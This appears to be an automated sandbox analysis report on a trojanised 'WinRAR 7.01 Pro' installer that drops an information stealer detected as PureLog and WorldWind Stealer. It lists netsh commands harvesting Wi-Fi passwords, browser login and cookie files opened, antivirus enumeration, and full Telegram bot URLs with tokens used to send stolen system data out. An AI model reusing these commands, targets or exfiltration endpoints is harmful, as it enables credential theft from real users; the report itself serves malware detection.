Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B6A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&55
Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&&
Source: winrar_x64_701ar.exe, 00000001.00000003.2247409938.000002628B695000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B6A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAV
Source: winrar_x64_701ar.exe, 00000001.00000002.2998601755.000002628712C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d{y
Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\%
Source: winrar_x64_701ar.exe, 00000001.00000003.2557359939.000002628B6B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&M
Source: winrar_x64_701ar.exe, 00000001.00000003.2809054918.000002628B6B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\vv
Source: winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: winrar_x64_701ar.exe, 00000001.00000003.2557840945.0000025A83085000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\m
Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
Source: winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BE}.
Source: winrar_x64_701ar.exe, 00000001.00000002.2998601755.000002628717B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Prod_VMware_SATAY
Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B681000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&++
Source: winrar_x64_701ar.exe, 00000001.00000003.2247409938.000002628B695000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Code function: 1_2_00007FF6C3BBA170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00007FF6C3BBA170

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Code function: 1_2_00007FF6C3BCB630 GetProcessHeap,

1_2_00007FF6C3BCB630

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BB9458 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF6C3BB9458
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BBA354 SetUnhandledExceptionFilter,	1_2_00007FF6C3BBA354
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BBA170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6C3BBA170
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BBFEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6C3BBFEC8

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process created: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe "C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process created: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe "C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Code function: 1_2_00007FF6C3BD1230 cpuid

1_2_00007FF6C3BD1230

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Code function: GetLocaleInfoW,

1_2_00007FF6C3BB2954

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Queries volume information: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Code function: 1_2_00007FF6C3BB41D0 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,CloseHandle,

1_2_00007FF6C3BB41D0

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Code function: 1_2_00007FF6C3BA2A74 GetVersionExW,

1_2_00007FF6C3BA2A74

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 3.3._microsoft_corporation.exe.26bbf08.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.1786072465.00000000026BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected WorldWind Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 3.3._microsoft_corporation.exe.26bbf08.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.1786072465.00000000026BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected WorldWind Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	351 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	251 Virtualization/Sandbox Evasion	Security Account Manager	251 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Software Packing	Cached Domain Credentials	4 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	147 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
WinRAR 7.01 Pro.exe	45%	ReversingLabs	ByteCode-MSIL.Spyware.Redline
WinRAR 7.01 Pro.exe	100%	Avira	TR/Dropper.MSIL.Gen
WinRAR 7.01 Pro.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	100%	Avira	TR/Dropper.MSIL.Gen
C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	62%	ReversingLabs	ByteCode-MSIL.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://api.telegram.org/bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://api.telegram.org/bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Stealer%202.0.4%20-%20Results:%0ADate:%202024-08-13%203:48:43%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20528110%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%206MM9C%0ARAM:%204095MB%0AHWID:%209F5911B2B1%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True	0%	Avira URL Cloud	safe
https://aka.ms/Vh5j3kI	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://api.telegram.org/bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendDocument?chat_id=750182271	0%	Avira URL Cloud	safe
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	0%	Avira URL Cloud	safe
https://aka.ms/odirm	0%	Avira URL Cloud	safe
http://icanhazip.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.mylnikov.org	104.21.44.66	true	false	unknown
api.telegram.org	149.154.167.220	true	true	unknown
icanhazip.com	104.16.185.241	true	false	unknown
238.14.8.0.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Stealer%202.0.4%20-%20Results:%0ADate:%202024-08-13%203:48:43%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20528110%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%206MM9C%0ARAM:%204095MB%0AHWID:%209F5911B2B1%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True	true	Avira URL Cloud: safe	unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendDocument?chat_id=750182271	true	Avira URL Cloud: safe	unknown
http://icanhazip.com/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	tmp22D7.tmp.dat.3.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	false	Avira URL Cloud: safe	unknown
